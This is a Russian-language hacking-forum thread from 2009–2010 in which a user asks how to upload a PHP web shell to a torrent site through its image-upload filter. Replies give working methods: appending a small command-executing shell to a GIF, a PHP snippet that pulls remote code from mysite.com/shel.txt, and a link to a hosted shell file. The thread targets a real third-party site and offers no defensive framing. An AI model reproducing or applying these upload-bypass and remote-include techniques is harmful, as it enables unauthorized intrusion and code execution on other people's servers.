HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Нужно залить shell через картинку
  #1  
Старый 04.05.2009, 19:23
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
С нами: 9725544

Репутация: 246
По умолчанию Нужно залить shell через картинку

Есть торрент в нем есть заливка картинок.
Могу залить картинку и сделать её не jpeg а php.
При заливке простой картинки все нормально и в пхп сохраняет. Вот ниже если поменять jpg на php то на сервер он зальёт как php.
Код:
-----------------------------220022761016327\r\nContent-Disposition: form-data; name="file"; 
\nContent-Disposition: form-data; name="file"; filename="1.jpg"\r\nContent-Type: 
и там дальше  исходник картинки.

А вот когда шелл сохраняем в формате jpg и пытаюсь залить он не заливает.

Вобщем кто знает как обойти фильтр.
Все делается через post запрос.
Или скинте картинку с шелом
 
Ответить с цитированием

  #2  
Старый 04.05.2009, 20:41
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Состряпай в пейнте картинку 1 на 1.
Открой её фаром и на новой строке впиши код шелла (какой нидь не большой типа выполнялки команд).

К примеру гифка: http://rapidshare.com/files/229115118/m.gif.html
?ev=phpinfo();

Последний раз редактировалось Grey; 05.05.2009 в 01:05..
 
Ответить с цитированием

  #3  
Старый 04.05.2009, 23:01
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
С нами: 9725544

Репутация: 246
По умолчанию

да все супер залил но теперь при заходе на эту страницу вылетает такое.


 
Ответить с цитированием

  #4  
Старый 04.05.2009, 23:23
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Цитата:
Сообщение от S0ulVortex  
да все супер залил но теперь при заходе на эту страницу вылетает такое.


Всё правильно, так и будет вылезать, но код при этом будет выполняться, а все остальное будет отображаться как html.

Если юзал мою картинку, то выполняй код так:

gif.php?ev=phpinfo();
 
Ответить с цитированием

  #5  
Старый 09.05.2009, 10:41
2fed
Познающий
Регистрация: 26.03.2008
Сообщений: 31
С нами: 9539749

Репутация: 21
По умолчанию

ну вот у меня трабл тоже самое я могу ... но на фотку твою добавил р57 не сработало (
 
Ответить с цитированием

  #6  
Старый 09.05.2009, 11:08
2fed
Познающий
Регистрация: 26.03.2008
Сообщений: 31
С нами: 9539749

Репутация: 21
По умолчанию

Грей обясни.. плз
 
Ответить с цитированием

  #7  
Старый 04.05.2009, 23:21
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Ну так,ты напиши код в конце картинки нужный, и заливай.
Например в конце допиши:
<?
if(isset($_GET['shell'])){
include('http://mysite.com/shel.txt');
}
?>
И обратись к шеллу, http://torent.ru/img/gif.php?shell
 
Ответить с цитированием

  #8  
Старый 04.02.2010, 23:43
oiki
Новичок
Регистрация: 21.01.2010
Сообщений: 15
С нами: 8580976

Репутация: 0
По умолчанию

Цитата:
Сообщение от m0Hze  
Ну так,ты напиши код в конце картинки нужный, и заливай.
Например в конце допиши:
<?
if(isset($_GET['shell'])){
include('http://mysite.com/shel.txt');
}
?>
И обратись к шеллу, http://torent.ru/img/gif.php?shell
кто-нибудь.. объясните пожалуста, как все-таки заливать через картинку? перепробовал все уже.
это особенно не понимаю: "И обратись к шеллу, http://torent.ru/img/gif.php?shell"
но как обратиться к shell.php если я заливал shell.gif...
 
Ответить с цитированием

  #9  
Старый 05.02.2010, 00:48
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Цитата:
Сообщение от oiki  
кто-нибудь.. объясните пожалуста, как все-таки заливать через картинку? перепробовал все уже.
это особенно не понимаю: "И обратись к шеллу, http://torent.ru/img/gif.php?shell"
но как обратиться к shell.php если я заливал shell.gif...
Обращайся к shell.gif снужными get параметрами.И сейчас эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже.
 
Ответить с цитированием

  #10  
Старый 09.05.2009, 11:20
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
С нами: 10566621

Репутация: 1198


По умолчанию

http://file-hran2006.narod.ru/shell.txt если нужен шелл, не ищи.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Залить шелл через подделку http запросов, на примере ipb 1.3 SURRENDER Уязвимости CMS / форумов 25 13.04.2005 15:37
Если папка окрытая для закачки файлов. Можно ли залить файл через приложения? indikatdupena Уязвимости 17 12.04.2005 20:49
Как залить шелл через PhPBB SheFF Уязвимости CMS / форумов 5 29.11.2004 01:25
Как залить шелл через IPB форум, при отсутствии ftp? bbmz Уязвимости CMS / форумов 1 26.11.2004 18:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.